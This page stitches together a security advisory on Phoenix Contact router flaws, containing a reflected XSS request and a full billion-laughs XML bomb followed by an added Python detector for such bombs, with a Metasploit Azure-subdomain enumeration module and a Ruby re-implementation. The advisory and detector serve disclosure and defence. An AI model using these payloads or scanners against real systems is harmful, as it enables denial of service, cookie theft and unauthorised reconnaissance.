<pre><code>St. Pölten UAS
-------------------------------------------------------------------------------
              title| Multiple Vulnerabilities
            product| Phoenix Contact TC Cloud Client 1002-4G*,
                   | TC Router 3002T-4G, Cloud Client 1101T-TX/TX
 vulnerable version| &lt;2.07.2, &lt;2.07.2, &lt;2.06.10
      fixed version| 2.07.2, 2.07.2, 2.06.10
         CVE number| CVE-2023-3526, CVE-2023-3569
             impact| Medium
           homepage| https://www.phoenixcontact.com/
              found| 2023-05-04
                 by| A. Resanovic, S. Stockinger, T. Etzenberger
                   | These vulnerabilities were discovered during research at
                   | St. Pölten UAS, supported and coordinated by CyberDanube.
                   |
                   | https://fhstp.ac.at | https://cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"At Phoenix Contact, our approach is innovative, sustainable, and based on
partnership. This applies to how we deal with employees as well as with our
customers. We are also conscious of our social and environmental responsibility
and we act accordingly. With the vision of the All Electric Society, we also
want to empower our customers to act more sustainably by enabling the
comprehensive electrification, networking, and automation of all sectors of the
economy and infrastructure with our products and solutions."

Source: https://www.phoenixcontact.com/en-us/ueber-uns


Vulnerable versions
-------------------------------------------------------------------------------
TC Router 3002T-4G* / &lt;2.07.2
TC Cloud Client 1002-4G* / &lt;2.07.2
Cloud Client 1101T-TX/TX / &lt;2.06.10

Vulnerability overview
-------------------------------------------------------------------------------
1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526
A reflected cross-site scripting vulnerability can be triggered in the license
viewer of the device. It can be used to execute attacker-controlled script in
the context of a user's browser. Cookies may also be stolen this way.

2) Excessive Memory Consumption (Billion Laughs Attack) CVE-2023-3569
By uploading a crafted configuration file, the XML parser on the device can be
made to expand nested entity references exponentially. The resulting memory
consumption slows down all other processes.

Proof of Concept
-------------------------------------------------------------------------------
1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526
The reflected cross-site scripting vulnerability can be triggered with the
following GET request:
https://$IP/cgi-bin/p/license?pkg=netsnmp&txt=15"><script>alert("document.cookie")</script>

2) Excessive Memory Consumption (Billion Laughs Attack) CVE-2023-3569
The following configuration file can be used to exploit the binary
"/usr/bin/xmlconfig", which supports entity reference nodes. Nine nested
levels with ten references each expand the three-byte entity "lol" to about
3 GB of text:
===============================================================================
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2
"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3
"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4
"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5
"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6
"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7
"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8
"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9
"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
===============================================================================

The vulnerabilities were manually verified on an emulated device using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution
-------------------------------------------------------------------------------
Update to the latest available firmware version.

Workaround
-------------------------------------------------------------------------------
None.


Recommendation
-------------------------------------------------------------------------------
Phoenix Contact customers are advised to upgrade the firmware to the latest
available version.


Contact Timeline
-------------------------------------------------------------------------------
2023-05-16: Contacting vendor via psirt@phoenixcontact.com
2023-05-17: Vendor informed internal product team.
2023-05-18: Added responsible disclosure policy from St. Pölten UAS.
2023-05-19: Vendor needs more time to fix the issues.
2023-06-15: Vendor asked for an explanation of the issues as they could not
            reproduce them; sent screenshots and more PoCs to the vendor.
            Offered an MS Teams call to clarify the issues.
2023-06-16: Scheduled a call for 2023-06-19.
2023-06-19: Clarified issues and further timeline for the coordination.
            Vendor proposed to release the firmware on 2023-07-13.
2023-07-04: Vendor contact stated that the release has to be shifted to after
            July; it will be released on 2023-08-08. Confirmed the date.
2023-07-13: Received CVE numbers from vendor.
2023-07-18: Received firmware versions from vendor.
2023-07-23: Vendor released firmware.
2023-08-08: Coordinated release of security advisory.

Web: https://www.fhstp.ac.at/
Twitter: https://twitter.com/fh_stpoelten
Mail: mis at fhstp dot ac dot at

EOF T. Weber / @2023


</code></pre>
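<p>The billion-laughs PoC in the advisory works because each of the nine entity levels multiplies the previous one by ten, so the parser tries to materialise three billion bytes from a file of under a kilobyte. A device that accepts configuration uploads can estimate that expansion from the entity declarations alone, before handing the document to its XML parser, and reject anything that amplifies beyond a sane ratio. The following Python is an added example written for this page; it is not code from the advisory, from CyberDanube or from Phoenix Contact. The DTD parsing is a deliberately minimal regex over internal general entities (external entities, parameter entities and attribute defaults are out of scope here), and the thresholds and sample documents are constructed assumptions.</p>

```python
# Added example, not from the advisory: a pre-parse check that estimates how far
# an uploaded XML configuration would expand before it is handed to an XML
# parser, which is what a billion-laughs payload like the PoC above abuses.
import re

# Internal general entity declarations: <!ENTITY name "value">
ENTITY_RE = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
# Entity references inside values and body text: &name;
REF_RE = re.compile(r'&(\w+);')
# Predefined XML entities each expand to a single character.
PREDEFINED = {'lt', 'gt', 'amp', 'quot', 'apos'}


def parse_entities(doc):
    """Map entity name -> replacement text, taken from the internal DTD subset."""
    return dict(ENTITY_RE.findall(doc))


def expanded_size(name, entities, memo, stack=frozenset()):
    """Characters produced by fully expanding &name;, computed from the
    declarations alone so the expansion itself is never materialised.
    Raises ValueError for undeclared or recursive entities."""
    if name in memo:
        return memo[name]
    if name in stack:
        raise ValueError('recursive entity: ' + name)
    if name not in entities:
        if name in PREDEFINED:
            return 1
        raise ValueError('undeclared entity: ' + name)
    value = entities[name]
    size, last = 0, 0
    for m in REF_RE.finditer(value):
        size += m.start() - last                      # literal text before the reference
        size += expanded_size(m.group(1), entities, memo, stack | {name})
        last = m.end()
    size += len(value) - last                         # literal text after the last reference
    memo[name] = size
    return size


def body_expansion(doc):
    """Total expanded size of all entity references in the document body
    (everything after the internal DTD subset)."""
    entities = parse_entities(doc)
    _, sep, rest = doc.partition(']>')
    body = rest if sep else doc
    memo = {}
    return sum(expanded_size(m.group(1), entities, memo) for m in REF_RE.finditer(body))


def check_xml_upload(doc, max_expansion=1_000_000, max_amplification=100):
    """Return (accepted, expanded_size). Rejects documents whose entity
    expansion is too large in absolute terms or relative to the upload size,
    and documents with undeclared or recursive entities. Thresholds are
    assumptions for the example."""
    try:
        size = body_expansion(doc)
    except ValueError:
        return False, 0
    amplification = size / max(len(doc), 1)
    return size <= max_expansion and amplification <= max_amplification, size


def billion_laughs(depth=9, fanout=10):
    """Constructed payload with the same shape as the advisory's PoC:
    a 3-byte entity referenced `fanout` times per level over `depth` levels."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        prev = 'lol' if i == 1 else 'lol%d' % (i - 1)
        decls.append('<!ENTITY lol%d "%s">' % (i, ('&%s;' % prev) * fanout))
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n<!ELEMENT lolz (#PCDATA)>\n'
            + '\n'.join(decls) + '\n]>\n<lolz>&lol%d;</lolz>\n' % depth)


# Constructed benign upload for comparison.
BENIGN = ('<?xml version="1.0"?>\n<!DOCTYPE config [\n<!ENTITY vendor "Phoenix Contact">\n]>\n'
          '<config><name>&vendor;</name><note>a &amp; b</note></config>\n')

if __name__ == '__main__':
    print(check_xml_upload(billion_laughs()))  # (False, 3000000000)
    print(check_xml_upload(BENIGN))            # (True, 16)
```

<p>The check runs in time proportional to the number of declarations because sizes are memoised per entity, so it costs nothing measurable even on the PoC, while the parser it protects would otherwise allocate gigabytes. The recursion guard matters too: a pair of mutually referencing entities is a separate way to hang a naive expander and is rejected as malformed rather than measured.</p>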
<pre><code>*Background:*

Microsoft makes use of a number of different domains and subdomains for
each of their Azure services. From SQL databases to SharePoint drives, each
service maps to its respective domain/subdomain, and with the proper
toolset, these can be identified through DNS enumeration to yield
information about the target domain's infrastructure.
enum_azuresubdomains.rb is a Metasploit module for enumerating public Azure
services by validating legitimate subdomains through various DNS record
queries. This cloud reconnaissance module rapidly identifies API services,
storage accounts, key vaults, databases, and more! Expedite your cloud
reconnaissance phases with enum_azuresubdomains.rb.

*Code:*

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Auxiliary
  include Msf::Exploit::Remote::DNS::Enumeration

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Azure Subdomain Scanner and Enumerator',
        'Description' => 'This module can be used for enumerating public Azure services by locating valid subdomains through various DNS queries.',
        'Author' => ['RoseSecurity &lt;RoseSecurityConsulting[at]protonmail.me&gt;'],
        'References' => [
          ['URL', 'https://www.netspi.com/blog/technical/cloud-penetration-testing/enumerating-azure-services']
        ],
        'License' => MSF_LICENSE
      )
    )
    register_options(
      [
        OptString.new('DOMAIN', [true, 'The target domain without TLD (Ex: victim rather than victim.org)']),
        OptBool.new('PERMUTATIONS', [false, 'Prepend and append permutated keywords to domain', false]),
        OptBool.new('ENUM_A', [true, 'Enumerate DNS A record', true]),
        OptBool.new('ENUM_CNAME', [true, 'Enumerate DNS CNAME record', true]),
        OptBool.new('ENUM_MX', [true, 'Enumerate DNS MX record', true]),
        OptBool.new('ENUM_NS', [true, 'Enumerate DNS NS record', true]),
        OptBool.new('ENUM_SOA', [true, 'Enumerate DNS SOA record', true]),
        OptBool.new('ENUM_TXT', [true, 'Enumerate DNS TXT record', true])
      ]
    )
  end

  # Only candidates with an A record are reported; for each of those the
  # selected record types are then queried and printed by the mixin helpers.
  def dns_enum(target_domains)
    target_domains.each do |domain|
      next unless dns_get_a(domain)

      print_good("Discovered Target Domain: #{domain}")
      dns_get_a(domain) if datastore['ENUM_A']
      dns_get_cname(domain) if datastore['ENUM_CNAME']
      dns_get_ns(domain) if datastore['ENUM_NS']
      dns_get_mx(domain) if datastore['ENUM_MX']
      dns_get_soa(domain) if datastore['ENUM_SOA']
      dns_get_txt(domain) if datastore['ENUM_TXT']
    end
  end

  def run
    domain = datastore['DOMAIN']

    # Azure service suffixes appended to every candidate name
    subdomains = [
      '.onmicrosoft.com',
      '.scm.azurewebsites.net',
      '.azurewebsites.net',
      '.p.azurewebsites.net',
      '.cloudapp.net',
      '.file.core.windows.net',
      '.blob.core.windows.net',
      '.queue.core.windows.net',
      '.table.core.windows.net',
      '.mail.protection.outlook.com',
      '.sharepoint.com',
      '.redis.cache.windows.net',
      '.documents.azure.com',
      '.database.windows.net',
      '.vault.azure.net',
      '.azureedge.net',
      '.search.windows.net',
      '.azure-api.net',
      '.azurecr.io'
    ]

    # Keywords prepended and appended to the target name when PERMUTATIONS is set
    permutations = %w[
      root
      web
      api
      azure
      azure-logs
      data
      database
      data-private
      data-public
      dev
      development
      demo
      files
      filestorage
      internal
      keys
      logs
      private
      prod
      production
      public
      service
      services
      splunk
      sql
      staging
      storage
      storageaccount
      test
      useast
      useast2
      centralus
      northcentralus
      westcentralus
      westus
      westus2
    ]

    # Base names: the plain target plus, if enabled, "&lt;domain&gt;-&lt;keyword&gt;"
    # and "&lt;keyword&gt;-&lt;domain&gt;" for every keyword
    base_names = [domain]
    if datastore['PERMUTATIONS']
      permutations.each do |keyword|
        base_names &lt;&lt; "#{domain}-#{keyword}" &lt;&lt; "#{keyword}-#{domain}"
      end
    end

    # Join every base name with every Azure service suffix and query them all
    target_domains = base_names.product(subdomains).map { |name, suffix| name + suffix }
    dns_enum(target_domains)
  end
end
</code></pre>
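<p>The same enumeration can be driven outside Metasploit with Ruby's standard-library resolver. The block below is an added example written for this page, not the RoseSecurity module or any part of the Metasploit framework: it separates candidate generation from resolution so the permutation set can be checked offline with an injected lookup, and it uses only a short keyword list (an assumption; the module's full list applies the same way). Everything else, including the target name and the stubbed address in the usage, is constructed.</p>

```ruby
# Added example, not the module from the post: Azure candidate generation and
# resolution without Metasploit, using Ruby's stdlib resolver. The lookup is
# injectable so the candidate logic can be exercised offline.
require 'resolv'

# Azure service suffixes, as listed in the module above.
AZURE_SUFFIXES = %w[
  .onmicrosoft.com .scm.azurewebsites.net .azurewebsites.net .p.azurewebsites.net
  .cloudapp.net .file.core.windows.net .blob.core.windows.net .queue.core.windows.net
  .table.core.windows.net .mail.protection.outlook.com .sharepoint.com
  .redis.cache.windows.net .documents.azure.com .database.windows.net .vault.azure.net
  .azureedge.net .search.windows.net .azure-api.net .azurecr.io
].freeze

# Shortened keyword list (assumption: a subset of the module's permutations).
KEYWORDS = %w[api dev prod storage].freeze

# Candidates: the bare name plus, when enabled, "<name>-<kw>" and "<kw>-<name>"
# for each keyword, each joined to every Azure suffix.
def candidate_names(name, permutations: false, keywords: KEYWORDS)
  bases = [name]
  keywords.each { |kw| bases << "#{name}-#{kw}" << "#{kw}-#{name}" } if permutations
  bases.product(AZURE_SUFFIXES).map { |base, suffix| base + suffix }
end

# Live lookup: A record addresses for fqdn, or [] when it does not resolve.
def resolve_a(fqdn)
  Resolv::DNS.open { |dns| dns.getaddresses(fqdn).map(&:to_s) }
rescue Resolv::ResolvError, Resolv::ResolvTimeout
  []
end

# Returns { fqdn => [addresses] } for every candidate that resolves.
def enumerate_azure(name, permutations: false, lookup: method(:resolve_a))
  candidate_names(name, permutations: permutations).each_with_object({}) do |fqdn, found|
    addrs = lookup.call(fqdn)
    found[fqdn] = addrs unless addrs.empty?
  end
end

# Usage: ruby enum_azure.rb <name> [permutations]
if __FILE__ == $PROGRAM_NAME && !ARGV.empty?
  enumerate_azure(ARGV[0], permutations: ARGV[1] == 'permutations').each do |fqdn, addrs|
    puts "[+] #{fqdn} -> #{addrs.join(', ')}"
  end
end
```

<p>With permutations enabled the candidate count is suffixes × (1 + 2 × keywords), so with the module's 36 keywords and 19 suffixes a single name turns into 1,387 queries; that volume is what makes the injected lookup worth having, since the candidate set can be reviewed before any DNS traffic is generated.</p>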